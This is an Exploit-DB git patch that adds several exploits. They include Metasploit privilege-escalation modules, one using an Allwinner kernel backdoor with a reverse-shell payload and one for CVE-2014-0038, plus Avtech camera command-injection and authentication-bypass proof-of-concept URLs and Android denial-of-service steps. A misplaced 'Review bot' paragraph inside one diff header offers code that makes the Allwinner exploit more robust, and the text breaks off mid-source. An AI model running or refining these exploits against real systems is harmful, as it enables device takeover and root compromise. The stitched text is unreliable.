From f8b17d14a142c75c1542dbfb1d529baba29237f3 Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Wed, 12 Oct 2016 05:01:17 +0000 Subject: [PATCH] DB: 2016-10-12 12 new exploits Linux Kernel 4.6.2 (Ubuntu 16.04.1) - IP6T_SO_SET_REPLACE Privilege Escalation Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_SO_SET_REPLACE' Privilege Escalation Spacemarc News - Cross-Site Request Forgery (Add New Post) Minecraft Launcher - Insecure File Permissions Privilege Escalation BirdBlog 1.4.0 - (Add New Post) Cross-Site Request Forgery phpEnter 4.2.7 - (Add New Post) Cross-Site Request Forgery sheed AntiVirus - Unquoted Service Path Privilege Escalation AVTECH IP Camera_ NVR_ and DVR Devices - Multiple Vulnerabilities RSA Enterprise Compromise Assessment Tool 4.1.0.1 - XML External Entity Injection Android - 'gpsOneXtra' Data Files Denial of Service Linux Kernel 3.13.1 - Recvmmsg Privilege Escalation (Metasploit) Allwinner 3.4 Legacy Kernel - Local Privilege Escalation (Metasploit) ApPHP MicroBlog 1.0.2 - Stored Cross Site Scripting ApPHP MicroBlog 1.0.2 - Cross-Site Request Forgery (Add New Author) --- files.csv | 14 +- platforms/android/dos/40502.txt | 234 ++++++++++++++++++++ platforms/android/local/40504.rb | 83 +++++++ platforms/cgi/webapps/40500.txt | 218 ++++++++++++++++++ platforms/linux/local/40503.rb | 354 ++++++++++++++++++++++++++++++ platforms/php/webapps/40493.html | 94 ++++++++ platforms/php/webapps/40495.html | 38 ++++ platforms/php/webapps/40496.html | 83 +++++++ platforms/php/webapps/40505.txt | 26 +++ platforms/php/webapps/40506.html | 155 +++++++++++++ platforms/windows/local/40494.txt | 29 +++ platforms/windows/local/40497.txt | 29 +++ platforms/xml/webapps/40501.txt | 140 ++++++++++++ 13 files changed, 1496 insertions(+), 1 deletion(-) create mode 100755 platforms/android/dos/40502.txt create mode 100755 platforms/android/local/40504.rb create mode 100755 platforms/cgi/webapps/40500.txt create mode 100755 platforms/linux/local/40503.rb create mode 100755 platforms/php/webapps/40493.html create mode 100755 
platforms/php/webapps/40495.html
create mode 100755 platforms/php/webapps/40496.html
create mode 100755 platforms/php/webapps/40505.txt
create mode 100755 platforms/php/webapps/40506.html
create mode 100755 platforms/windows/local/40494.txt
create mode 100755 platforms/windows/local/40497.txt
create mode 100755 platforms/xml/webapps/40501.txt
diff --git a/files.csv b/files.csv
index cde6f0e23..140ab3f46 100755
--- a/files.csv
+++ b/files.csv
@@ -36606,7 +36606,19 @@ id,file,description,date,author,platform,type,port
 40486,platforms/php/webapps/40486.txt,"PHP Press Release - Cross-Site Request Forgery (Add Admin)",2016-10-09,Besim,php,webapps,0
 40487,platforms/php/webapps/40487.txt,"PHP Press Release - Stored Cross Site Scripting",2016-10-09,Besim,php,webapps,0
 40488,platforms/linux/local/40488.txt,"Apache Tomcat 8/7/6 (RedHat-Based Distros) - Privilege Escalation",2016-10-10,"Dawid Golunski",linux,local,0
-40489,platforms/lin_x86-64/local/40489.txt,"Linux Kernel 4.6.2 (Ubuntu 16.04.1) - IP6T_SO_SET_REPLACE Privilege Escalation",2016-10-10,"Qian Zhang",lin_x86-64,local,0
+40489,platforms/lin_x86-64/local/40489.txt,"Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_SO_SET_REPLACE' Privilege Escalation",2016-10-10,"Qian Zhang",lin_x86-64,local,0
 40490,platforms/windows/local/40490.txt,"Zend Studio IDE 13.5.1 - Insecure File Permissions Privilege Escalation",2016-10-10,hyp3rlinx,windows,local,0
 40491,platforms/multiple/remote/40491.py,"HP Client - Automation Command Injection / Remote Code Execution",2016-10-10,SlidingWindow,multiple,remote,0
 40492,platforms/php/webapps/40492.html,"Maian Weblog 4.0 - Cross-Site Request Forgery (Add New Post)",2016-10-10,Besim,php,webapps,0
+40493,platforms/php/webapps/40493.html,"Spacemarc News - Cross-Site Request Forgery (Add New Post)",2016-10-10,Besim,php,webapps,0
+40494,platforms/windows/local/40494.txt,"Minecraft Launcher - Insecure File Permissions Privilege Escalation",2016-10-11,"Ross Marks",windows,local,0
+40495,platforms/php/webapps/40495.html,"BirdBlog 1.4.0 - (Add New Post) Cross-Site Request Forgery",2016-10-11,Besim,php,webapps,80
+40496,platforms/php/webapps/40496.html,"phpEnter 4.2.7 - (Add New Post) Cross-Site Request Forgery",2016-10-11,Besim,php,webapps,80
+40497,platforms/windows/local/40497.txt,"sheed AntiVirus - Unquoted Service Path Privilege Escalation",2016-10-11,Amir.ght,windows,local,0
+40500,platforms/cgi/webapps/40500.txt,"AVTECH IP Camera_ NVR_ 
and DVR Devices - Multiple Vulnerabilities",2016-10-11,"Gergely Eberhardt",cgi,webapps,80
+40501,platforms/xml/webapps/40501.txt,"RSA Enterprise Compromise Assessment Tool 4.1.0.1 - XML External Entity Injection",2016-10-11,"SEC Consult",xml,webapps,0
+40502,platforms/android/dos/40502.txt,"Android - 'gpsOneXtra' Data Files Denial of Service",2016-10-11,"Nightwatch Cybersecurity Research",android,dos,0
+40503,platforms/linux/local/40503.rb,"Linux Kernel 3.13.1 - Recvmmsg Privilege Escalation (Metasploit)",2016-10-11,Metasploit,linux,local,0
+40504,platforms/android/local/40504.rb,"Allwinner 3.4 Legacy Kernel - Local Privilege Escalation (Metasploit)",2016-10-11,Metasploit,android,local,0
+40505,platforms/php/webapps/40505.txt,"ApPHP MicroBlog 1.0.2 - Stored Cross Site Scripting",2016-10-11,Besim,php,webapps,0
+40506,platforms/php/webapps/40506.html,"ApPHP MicroBlog 1.0.2 - Cross-Site Request Forgery (Add New Author)",2016-10-11,Besim,php,webapps,0
diff --git a/platforms/android/dos/40502.txt b/platforms/android/dos/40502.txt
new file mode 100755
index 000000000..85850df0e
--- /dev/null
+++ b/platforms/android/dos/40502.txt
@@ -0,0 +1,234 @@
+Original at:
+https://wwws.nightwatchcybersecurity.com/2016/10/04/advisory-cve-2016-5348-2/
+
+Summary
+
+Android devices can be crashed remotely forcing a halt and then a soft
+reboot by a MITM attacker manipulating assisted GPS/GNSS data provided
+by Qualcomm. This issue affects the open source code in AOSP and
+proprietary code in a Java XTRA downloader provided by Qualcomm. The
+Android issue was fixed by in the October 2016 Android bulletin.
+Additional patches have been issued by Qualcomm to the proprietary
+client in September of 2016. This issue may also affect other
+platforms that use Qualcomm GPS chipsets and consume these files but
+that has not been tested by us, and requires further research.
+
+Background – GPS and gpsOneXtra
+
+Most mobile devices today include ability to locate themselves on the
+Earth’s surface by using the Global Positioning System (GPS), a system
+originally developed and currently maintained by the US military.
+Similar systems developed and maintained by other countries exist as
+well including Russia’s GLONASS, Europe’s Galileo, and China’s Beidou.
+The GPS signals include an almanac which lists orbit and status
+information for each of the satellites in the GPS constellation. This
+allows the receivers to acquire the satellites quicker since the
+receiver would not need to search blindly for the location of each
+satellite. Similar functionality exists for other GNSS systems. In
+order to solve the problem of almanac acquisition, Qualcomm developed
+the gpsOneXtra system in 2007 (also known as IZat XTRA Assistance
+since 2013). This system provides ability to GPS receivers to download
+the almanac data over the Internet from Qualcomm-operated servers. The
+format of these XTRA files is proprietary but seems to contain current
+satellite location data plus estimated locations for the next 7 days,
+as well as additional information to improve signal acquisition. 
Most
+Qualcomm mobile chipsets and GPS chips include support for this
+technology. A related Qualcomm technology called IZat adds ability to
+use WiFi and cellular networks for locations in addition to GPS.
+
+Background – Android and gpsOneXtra Data Files
+
+During our network monitoring of traffic originating from an Android
+test device, we discovered that the device makes periodic calls to the
+Qualcomm servers to retrieve gpsOneXtra assistance files. These
+requests were performed almost every time the device connected to a
+WiFi network. As discovered by our research and confirmed by the
+Android source code, the following URLs were used:
+
+http://xtra1.gpsonextra.net/xtra.bin
+http://xtra2.gpsonextra.net/xtra.bin
+http://xtra3.gpsonextra.net/xtra.bin
+
+http://xtrapath1.izatcloud.net/xtra2.bin
+http://xtrapath2.izatcloud.net/xtra2.bin
+http://xtrapath3.izatcloud.net/xtra2.bin
+
+WHOIS record show that both domains – gpsonextra.net and izatcloud.net
+are owned by Qualcomm. Further inspection of those URLs indicate that
+both domains are being hosted and served from Amazon’s Cloudfront CDN
+service (with the exception of xtra1.gpsonextra.net which is being
+served directly by Qualcomm). On the Android platform, our inspection
+of the Android source code shows that the file is requested by an
+OS-level Java process (GpsXtraDownloader.java), which passes the data
+to a C++ JNI class
+(com_android_server_location_GnssLocationProvider.cpp), which then
+injects the files into the Qualcomm modem or firmware. We have not
+inspected other platforms in detail, but suspect that a similar
+process is used. Our testing was performed on Android v6.0, patch
+level of January 2016, on a Motorola Moto G (2nd gen) GSM phone, and
+confirmed on a Nexus 6P running Android v6.01, with May 2016 security
+patches. Qualcomm has additionally performed testing on their
+proprietary Java XTRA downloader client confirming this vulnerability. 
+
+Vulnerability Details
+
+Android platform downloads XTRA data files automatically when
+connecting to a new network. This originates from a Java class
+(GpsXtraDownloader.java), which then passes the file to a C++/JNI
+class (com_android_server_location_GnssLocationProvider.cpp) and then
+injects it into the Qualcomm modem.
+
+The vulnerability is that both the Java and the C++ code do not check
+how large the data file actually is. If a file is served that is
+larger than the memory available on the device, this results in all
+memory being exhausted and the phone halting and then soft rebooting.
+The soft reboot was sufficient to recover from the crash and no data
+was lost. While we have not been able to achieve remote code execution
+in either the Qualcomm modem or in the Android OS, this code path can
+potentially be exploited for such attacks and would require more
+research.
+
+To attack, an MITM attacker located anywhere on the network between
+the phone being attacked and Qualcomm’s servers can initiate this
+attack by intercepting the legitimate requests from the phone, and
+substituting their own, larger files. Because the default Chrome
+browser on Android reveals the model and build of the phone (as we
+have written about earlier), it would be possible to derive the
+maximum memory size from that information and deliver the
+appropriately sized attack file. Possible attackers can be hostile
+hotspots, hacked routers, or anywhere along the backbone. This is
+somewhat mitigated by the fact that the attack file would need to be
+as large as the memory on the phone. 
+
+The vulnerable code resides here – (GpsXtraDownloader.java, lines 120-127):
+
+connection.connect()
+int statusCode = connection.getResponseCode();
+if (statusCode != HttpURLConnection.HTTP_OK) {
+if (DEBUG) Log.d(TAG, “HTTP error downloading gps XTRA: “ + statusCode);
+return null;
+}
+return Streams.readFully(connection.getInputStream());
+
+Specifically, the affected code is using Streams.readFully to read the
+entire file into memory without any kind of checks on how big the file
+actually is.
+
+Additional vulnerable code is also in the C++ layer –
+(com_android_server_location_GnssLocationProvider.cpp, lines 856-858):
+
+jbyte* bytes = (jbyte *)env->GetPrimitiveArrayCritical(data, 0);
+sGpsXtraInterface->inject_xtra_data((char *)bytes, length);
+env->ReleasePrimitiveArrayCritical(data, bytes, JNI_ABORT);
+
+Once again, no size checking is done. We were able to consistently
+crash several different Android phones via a local WiFi network with
+the following error message:
+
+java.lang.OutOfMemoryError: Failed to allocate a 478173740 byte
+allocation with 16777216 free bytes and 252MB until OOM
+at java.io.ByteArrayOutputStream.expand(ByteArrayOutputStream.java:91)
+
+(It should be noted that we were not able to consistently and reliable
+achieve a crash in the C++/JNI layer or the Qualcomm modem itself)
+
+Steps To Replicate (on Ubuntu 16.04)
+1. Install DNSMASQ:
+sudo apt-get install dnsmasq
+
+2. Install NGINX:
+sudo apt-get install nginx
+
+3. Modify the /etc/hosts file to add the following entries to map to
+the IP of the local computer (varies by vendor of the phone):
+192.168.1.x xtra1.gpsonextra.net
+192.168.1.x xtra2.gpsonextra.net
+192.168.1.x xtra3.gpsonextra.net
+192.168.1.x xtrapath1.izatcloud.net
+192.168.1.x xtrapath2.izatcloud.net
+192.168.1.x xtrapath3.izatcloud.net
+
+4. Configure /etc/dnsmasq.conf file to listed on the IP:
+listen-address=192.168.1.x
+
+5. Restart DNSMASQ:
+sudo /etc/init.d/dnsmasq restart
+
+6. 
Use fallocate to create the bin files in “/var/www/html/”
+sudo fallocate -s 2.5G xtra.bin
+sudo fallocate -s 2.5G xtra2.bin
+sudo fallocate -s 2.5G xtra3.bin
+
+7. Modify the settings on the Android test phone to static, set DNS to
+point to “192.168.1.x”. AT THIS POINT – Android will resolve DNS
+against the local computer, and serve the GPS files from it.
+
+To trigger the GPS download, disable WiFi and enable Wifi, or
+enable/disable Airplane mode. Once the phone starts downloading the
+files, the screen will go black and it will reboot.
+
+PLEASE NOTE: on some models, the XTRA file is cached and not retrieved
+on every network connect. For those models, you may need to reboot the
+phone and/or follow the injection commands as described here. You can
+also use an app like GPS Status and ToolboxGPS Status and Toolbox.
+
+The fix would be to check for file sizes in both Java and native C++ code.
+
+Mitigation Steps
+
+For the Android platform, users should apply the October 2016 Android
+security bulletin and any patches provided by Qualcomm. Please note
+that as per Qualcomm, the patches for this bug only include fixes to
+the Android Open Source Project (AOSP) and the Qualcomm Java XTRA
+downloader clients. Apple and Microsoft have indicated to us via email
+that GPS-capable devices manufactured by them including iPad, iPhones,
+etc. and Microsoft Surface and Windows Phone devices are not affected
+by this bug. Blackberry devices powered by Android are affected but
+the Blackberry 10 platform is not affected by this bug. For other
+platforms, vendors should follow guidance provided by Qualcomm
+directly via an OEM bulletin.
+
+Bounty Information
+
+This bug has fulfilled the requirements for Google’s Android Security
+Rewards and a bounty has been paid. 
+
+References
+
+Android security bulletin: October 2016
+CERT/CC tracking: VR-179
+CVE-ID: CVE-2016-5348
+Google: Android bug # 213747 / AndroidID-29555864
+
+CVE Information
+
+As provided by Qualcomm:
+
+CVE: CVE-2016-5348
+Access Vector: Network
+Security Risk: High
+Vulnerability: CWE-400: Uncontrolled Resource Consumption (‘Resource
+Exhaustion’)
+Description: When downloading a very large assistance data file, the
+client may crash due to out of memory error.
+Change summary:
+
+check download size ContentLength before downloading data
+catch OOM exception
+
+Credits
+
+We would like to thank CERT/CC for helping to coordinate this process,
+and all of the vendors involved for helpful comments and a quick
+turnaround. This bug was discovered by Yakov Shafranovich, and the
+advisory was also written by Yakov Shafranovich.
+
+Timeline
+
+201606-20: Android bug report filed with Google
+2016-06-21: Android bug confirmed
+2016-06-21: Bug also reported to Qualcomm and CERT.
+2016-09-14: Coordination with Qualcomm on public disclosure
+2016-09-15: Coordination with Google on public disclosure
+2016-10-03: Android security bulletin released with fix
+2016-10-04: Public disclosure
\ No newline at end of file
diff --git a/platforms/android/local/40504.rb b/platforms/android/local/40504.rb
new file mode 100755
index 000000000..b91127948
--- /dev/null
+++ b/platforms/android/local/40504.rb
@@ -0,0 +1,83 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require "msf/core" + +class MetasploitModule < Msf::Exploit::Local + Rank = ExcellentRanking + + include Msf::Post::File + include Msf::Post::Linux::Priv + include Msf::Exploit::EXE + + def initialize(info = {}) + super(update_info(info, + "Name" => "Allwinner 3.4 Legacy Kernel Local Privilege Escalation", + "Description" => %q{ + This module attempts to exploit a debug backdoor privilege escalation in + Allwinner SoC based devices. + Vulnerable Allwinner SoC chips: H3, A83T or H8 which rely on Kernel 3.4 + Vulnerable OS: all OS images available for Orange Pis, + any for FriendlyARM's NanoPi M1, + SinoVoip's M2+ and M3, + Cuebietech's Cubietruck + + Linksprite's pcDuino8 Uno + Exploitation may be possible against Dragon (x10) and Allwinner Android tablets + }, + "License" => MSF_LICENSE, + "Author" => + [ + "h00die ", # Module + "KotCzarny" # Discovery + ], + "Platform" => [ "android", "linux" ], + "DisclosureDate" => "Apr 30 2016", + "DefaultOptions" => { + "payload" => "linux/armle/mettle/reverse_tcp" + }, + "Privileged" => true, + "Arch" => ARCH_ARMLE, + "References" => + [ + [ "URL", "http://forum.armbian.com/index.php/topic/1108-security-alert-for-allwinner-sun8i-h3a83th8/"], + [ "URL", "https://webcache.googleusercontent.com/search?q=cache:l2QYVUcDflkJ:" \ + "https://github.com/allwinner-zh/linux-3.4-sunxi/blob/master/arch/arm/mach-sunxi/sunxi-debug.c+&cd=3&hl=en&ct=clnk&gl=us"], + [ "URL", "http://irclog.whitequark.org/linux-sunxi/2016-04-29#16314390"] + ], + "SessionTypes" => [ "shell", "meterpreter" ], + 'Targets' => + [ + [ 'Auto', { } ] + ], + 'DefaultTarget' => 0, + )) + end + + def check + backdoor = '/proc/sunxi_debug/sunxi_debug' + if file_exist?(backdoor) + Exploit::CheckCode::Appears + else + Exploit::CheckCode::Safe + end + end + + def exploit + backdoor = '/proc/sunxi_debug/sunxi_debug' + 
if file_exist?(backdoor)
+ pl = generate_payload_exe
+
+ exe_file = "/tmp/#{rand_text_alpha(5)}.elf"
+ vprint_good "Backdoor Found, writing payload to #{exe_file}"
+ write_file(exe_file, pl)
+ cmd_exec("chmod +x #{exe_file}")
+
+ vprint_good 'Escalating'
+ cmd_exec("echo rootmydevice > #{backdoor}; #{exe_file}")
+ else
+ print_error "Backdoor #{backdoor} not found."
+ end
+ end
+end
\ No newline at end of file
diff --git a/platforms/cgi/webapps/40500.txt b/platforms/cgi/webapps/40500.txt
new file mode 100755
index 000000000..670a6c403
--- /dev/null
+++ b/platforms/cgi/webapps/40500.txt
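Review bot: The `else` branch of `exploit` only calls `print_error` and then returns normally, so a session without `/proc/sunxi_debug/sunxi_debug` ends as a "successful" run instead of a recorded failure; `fail_with(Failure::NotVulnerable, "Backdoor #{backdoor} not found.")` is the framework's way to report that. The same path literal and `file_exist?` test are duplicated between `check` and `exploit`, and the result of `write_file(exe_file, pl)` is never inspected, so an unwritable directory is only noticed when the later `chmod` or launch command fails. The sibling module added in this commit (`platforms/linux/local/40503.rb`) registers a `WritableDir` option instead of hard-coding `/tmp`; doing the same here keeps the two modules consistent. A possible shape, assuming `WritableDir` is registered in `initialize` as in 40503.rb:
```ruby
  BACKDOOR = '/proc/sunxi_debug/sunxi_debug'

  def check
    file_exist?(BACKDOOR) ? Exploit::CheckCode::Appears : Exploit::CheckCode::Safe
  end

  def exploit
    unless check == Exploit::CheckCode::Appears
      fail_with(Failure::NotVulnerable, "Backdoor #{BACKDOOR} not found.")
    end

    exe_file = "#{datastore['WritableDir']}/#{rand_text_alpha(5)}.elf"
    vprint_good "Backdoor Found, writing payload to #{exe_file}"
    unless write_file(exe_file, generate_payload_exe)
      fail_with(Failure::Unknown, "Could not write #{exe_file}")
    end
    # … unchanged: chmod, 'Escalating' message, launch via the backdoor …
  end
```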
@@ -0,0 +1,218 @@
+Avtech devices multiple vulnerabilities
+--------------------------------------------------
+
+Platforms / Firmware confirmed affected:
+- Every Avtech device (IP camera, NVR, DVR) and firmware version. [4]
+contains the list of confirmed firmware versions, which are affected.
+- Product page: http://www.avtech.com.tw/
+
+ôAVTECH, founded in 1996, is one of the worldÆs leading CCTV
+manufacturers. With stably increasing revenue and practical business
+running philosophy, AVTECH has been ranked as the largest public-listed
+company among the Taiwan surveillance industry. AVTECH makes every
+effort on the innovation of technology, product and implementation.
+Based on years of research and industry experience, AVTECH has obtained
+a leading position on mobile platform support and provides a full range
+of surveillance products.ö
+
+Avtech is the second most popular search term in Shodan. According to
+Shodan, more than 130.000 Avtech devices are exposed to the internet.
+
+Vulnerabilities
+---------------
+1) Plaintext storage of administrative password
+Every user password is stored in clear text. An attacker with access to
+the device itself can easily obtain the full list of passwords. By
+exploiting command injection or authentication bypass issues, the clear
+text admin password can be retrieved.
+
+2) Missing CSRF protection
+The web interface does not use any CSRF protection. If a valid session
+exists for the user, the attacker can modify all settings of the device
+via CSRF. If there is no valid session, but the user did not change the
+default admin password, the attacker can log in as admin via CSRF as well.
+
+3) Unauthenticated information disclosure
+Under the /cgi-bin/nobody folder every CGI script can be accessed
+without authentication. 
+POC: GET /cgi-bin/nobody/Machine.cgi?action=get_capability
+Example response:
+Firmware.Version=1011-1005-1008-1002
+MACAddress=00:0E:53:xx:xx:xx
+Product.Type=DVR
+Product.ID=308B
+Product.ShortName=V_full_Indep,V_Multistream
+Video.System=PAL
+Audio.DownloadFormat=ULAW
+Video.Input.Num=8
+Video.Output.Num=1
+Video.Format=H264,MJPEG
+Video.Format.Default=H264
+Video.Resolution=4CIF,CIF
+Video.Quality=BEST,HIGH,NORMAL,BASIC
+Video.Local.Input.Num=8
+Video.Local.Output.Num=1
+Video.Local.Format=H264,MJPEG
+Audio.Input.Num=8
+Audio.Output.Num=1
+Audio.Format=ULAW
+Audio.Local.Input.Num=8
+Audio.Local.Output.Num=1
+Audio.Local.Format=PCM
+Language.Default=ENGLISH
+Language.Support=ENGLISH&CHINESE&JAPANESE&FRANCE&GERMAN&SPANISH&PORTUGUESE&ITALIAN&TURKISH&POLISH&RUSSIAN&CUSTOMIZE&THAI
+&VIETNAM&DUTCH&GREEK&ARABIC&CZECH&HUNGARIAN&HEBREW&CHINA&
+Capability=D0,80,A,80
+PushNotify.MaxChannel=8
+
+4) Unauthenticated SSRF in DVR devices
+In case of DVR devices, Search.cgi can be accessed without
+authentication. This service is responsible for searching and accessing
+IP cameras in the local network. In newer firmware versions, Search.cgi
+provides the cgi_query action, which performs an HTTP request with the
+specified parameters. By modifying the ip, port and queryb64str
+parameters, an attacker is able to perform arbitrary HTTP requests
+through the DVR device without authentication.
+POC:
+http:///cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==
+
+5) Unauthenticated command injection in DVR devices
+The cgi_query action in Search.cgi performs HTML requests with the wget
+system command, which uses the received parameters without sanitization
+or verification. By exploiting this issue, an attacker can execute any
+system command with root privileges without authentication. 
+POC:
+http:///cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=LW==&username=admin%20;XmlAp%20r%20Account.User1.Password>$(ps|grep%20Search.cgi|grep%20-v%20grep|head%20-n%201|awk%20'{print%20"/tmp/"$1".log"}');&password=admin
+
+6) Authentication bypass #1
+Video player plugins are stored as .cab files in the web root, which can
+be accessed and downloaded without authentication. The cab file request
+verification in the streamd web server is performed with the strstr
+function, which means that a request should not be authenticated if it
+contains the ô.cabö string anywhere in the URL. We note that some of the
+models contain an additional check in the CgiDaemon, which allows
+unauthenticated cgi access only under the /cgi-bin/nobody folder.
+POC:
+http:///cgi-bin/user/Config.cgi?.cab&action=get&category=Account.*
+
+7) Authentication bypass #2
+Cgi scripts in the /cgi-bin/nobody folder can be accessed without
+authentication (e.g. for login). The streamd web server verifies whether
+the request can be performed without authentication by searching for the
+ô/nobodyö string in the URL with the strstr function. Thus, if a
+request contains the "/nobody" string anywhere in the URL, it does not
+have to be authenticated. We note that some of the models contain an
+additional check in the CgiDaemon, which allows unauthenticated cgi
+access only under the /cgi-bin/nobody folder.
+POC:
+http:///cgi-bin/user/Config.cgi?/nobody&action=get&category=Account.*
+
+8) Unauthenticated file download from web root
+If a cab file is requested, the web server sends the file without
+processing it. Because the streamd web server verifies the cab file
+request by searching for the ô.cabö string in the URL with the strstr
+function, any file (even the cgi scripts) in the web root can be
+downloaded without authentication. 
+POC: http:///cgi-bin/cgibox?.cab
+
+9) Login captcha bypass #1
+To prevent brute-forcing attempts, Avtech devices require a captcha for
+login requests. However, if the login requests contain the login=quick
+parameter, the captcha verification is bypassed.
+POC:
+http:///cgi-bin/nobody/VerifyCode.cgi?account=&login=quick
+
+10) Login captcha bypass #2
+Instead of using a random session ID, Avtech devices use the
+base64-encoded username and password as the Cookie value. Since the IP
+address of the logged in user is not stored, if an attacker sets the
+Cookie manually, the captcha verification can by bypassed easily.
+
+11) Authenticated command injection in CloudSetup.cgi
+Devices that support the Avtech cloud contain CloudSetup.cgi, which can
+be accessed after authentication. The exefile parameter of a
+CloudSetup.cgi request specifies the system command to be executed.
+Since there is no verification or white list-based checking of the
+exefile parameter, an attacker can execute arbitrary system commands
+with root privileges.
+POC: http:///cgi-bin/supervisor/CloudSetup.cgi?exefile=ps
+
+12) Authenticated command injection in adcommand.cgi
+Some of the Avtech devices contain adcommand.cgi to perform ActionD
+commands. The adcommand.cgi can be accessed after authentication. In
+newer devices the ActionD daemon provides the DoShellCmd function, which
+performs a system call with the specified parameters. Since there is no
+verification or white list-based checking of the parameter of the
+DoShellCmd function, an attacker can execute arbitrary system commands
+with root privileges.
+POC:
+POST /cgi-bin/supervisor/adcommand.cgi HTTP/1.1
+Host:
+Content-Length: 23
+Cookie: SSID=YWRtaW46YWRtaW4=
+
+DoShellCmd "strCmd=ps&"
+
+13) Authenticated command injection in PwdGrp.cgi
+The PwdGrp.cgi uses the username, password and group parameters in a new
+user creation or modification request in a system command without
+validation or sanitization. 
Thus and attacker can execute arbitrary
+system commands with root privileges.
+We are aware that this vulnerability is being exploited in the wild!
+POC:
+http:///cgi-bin/supervisor/PwdGrp.cgi?action=add&user=test&pwd=;reboot;&grp=SUPERVISOR&lifetime=5%20MIN
+
+14) HTTPS used without certificate verification
+The SyncCloudAccount.sh, QueryFromClient.sh and SyncPermit.sh scripts
+use wget to access HTTPS sites, such as https://payment.eagleeyes.tw, by
+specifying the no-check-certificate parameter. Thus wget skips server
+certificate verification and a MITM attack is possible against the HTTPS
+communication.
+
+Timeline
+2015.10.19: First attempt to contact with Avtech, but we did not receive
+any response
+2016.05.24: Second attempt to contact Avtech without any response
+2016.05.27: Third attempt to contact Avtech by sending e-mail to public
+Avtech e-mail addresses. We did not receive any response.
+2016.xx.xx: Full disclosure
+
+POC
+---
+POC script is available to demonstrate the following problems [3]:
+- Unauthenticated information leakage (capabilities)
+- Authentication bypass (.cab, nobody)
+- Unauthenticated SSRF on DVR devices
+- Unauthenticated command injection on DVR devices
+- Login captcha bypass with login=quick or manual cookie creation
+- CloudSetup.cgi command injection after authentication
+- adcommand.cgi command injection after authentication
+
+A video demonstration is also available [1], which presents some of the
+above problems.
+
+Recommendations
+---------------
+Unfortunately there is no solution available for these vulnerabilities
+at the moment. You can take the following steps to protect your device:
+- Change the default admin password
+- Never expose the web interface of any Avtech device to the internet
+
+We note that the above vulnerabilities were found within a short period
+of time without a systematic approach. 
Based on the vulnerability types
+we found and the overall code quality, the devices should contain much
+more problems.
+
+Credits
+-------
+This vulnerability was discovered and researched by Gergely Eberhardt
+(@ebux25) from SEARCH-LAB Ltd. (www.search-lab.hu)
+
+References
+----------
+[1]
+https://www.search-lab.hu/advisories/126-avtech-devices-multiple-vulnerabilities
+
+[2] https://youtu.be/BUx8nLlIMxI
+[3] https://github.com/ebux/AVTECH
+[4] http://www.search-lab.hu/media/vulnerability_matrix.txt
diff --git a/platforms/linux/local/40503.rb b/platforms/linux/local/40503.rb
new file mode 100755
index 000000000..5bc558e17
--- /dev/null
+++ b/platforms/linux/local/40503.rb
@@ -0,0 +1,354 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require "msf/core"
+
+class MetasploitModule < Msf::Exploit::Local
+ Rank = GoodRanking
+
+ include Msf::Post::File
+ include Msf::Exploit::EXE
+ include Msf::Exploit::FileDropper
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Linux Kernel 3.13.1 Recvmmsg Privilege Escalation',
+ 'Description' => %q{
+ This module attempts to exploit CVE-2014-0038, by sending a recvmmsg
+ system call with a crafted timeout pointer parameter to gain root.
+ This exploit has offsets for 3 Ubuntu 13 kernels built in:
+ 3.8.0-19-generic (13.04 default)
+ 3.11.0-12-generic (13.10 default)
+ 3.11.0-15-generic (13.10)
+ This exploit may take up to 13 minutes to run due to a decrementing (1/sec)
+ pointer which starts at 0xff*3 (765 seconds)
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'h00die ', # Module
+ 'rebel' # Discovery
+ ],
+ 'DisclosureDate' => 'Feb 2 2014',
+ 'Platform' => [ 'linux'],
+ 'Arch' => [ ARCH_X86, ARCH_X86_64 ],
+ 'SessionTypes' => [ 'shell', 'meterpreter' ],
+ 'Targets' =>
+ [
+ [ 'Auto', { } ]
+ ],
+ 'DefaultTarget' => 0,
+ 'DefaultOptions' => { 'WfsDelay' => 780, 'PrependFork' => true, },
+ 'References' =>
+ [
+ [ 'EDB', '31347'],
+ [ 'EDB', '31346'],
+ [ 'CVE', '2014-0038'],
+ [ 'URL', 'https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1453900']
+ ]
+ ))
+ register_options(
+ [
+ OptString.new('WritableDir', [ true, 'A directory where we can write files (must not be mounted noexec)', '/tmp' ]),
+ OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', ['Auto', 'True', 'False']])
+ ], self.class)
+ end
+
+ def check
+ def kernel_vuln?()
+ os_id = cmd_exec('grep ^ID= /etc/os-release')
+ if os_id == 'ID=ubuntu'
+ kernel = Gem::Version.new(cmd_exec('/bin/uname -r'))
+ case kernel.release.to_s
+ when '3.11.0'
+ if kernel == Gem::Version.new('3.11.0-15-generic') || kernel == Gem::Version.new('3.11.0-12-generic')
+ vprint_good("Kernel #{kernel} is exploitable")
+ return true
+ else
+ print_error("Kernel #{kernel} is NOT vulnerable or NOT exploitable")
+ return false
+ end
+ when '3.8.0'
+ if kernel == Gem::Version.new('3.8.0-19-generic')
+ vprint_good("Kernel #{kernel} is exploitable")
+ return true
+ else
+ print_error("Kernel #{kernel} is NOT vulnerable or NOT exploitable")
+ return false
+ end
+ else
+ print_error("Non-vuln kernel #{kernel}")
+ return false
+ end
+ else
+ print_error("Unknown OS: #{os_id}")
+ return false
+ end
+ end
+
+ if kernel_vuln?()
+ return CheckCode::Appears
+ else
+ return CheckCode::Safe
+ end
+ end
+
+ def exploit
+
+ if check != CheckCode::Appears
+ fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!')
+ end
+
+
+ # direct copy of code from exploit-db. I removed a lot of the comments in the title area just to cut down on size
+
+ recvmmsg = %q{
+ /*
+ *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
+ recvmmsg.c - linux 3.4+ local root (CONFIG_X86_X32=y)
+ CVE-2014-0038 / x32 ABI with recvmmsg
+ by rebel @ irc.smashthestack.org
+ -----------------------------------
+ */
+
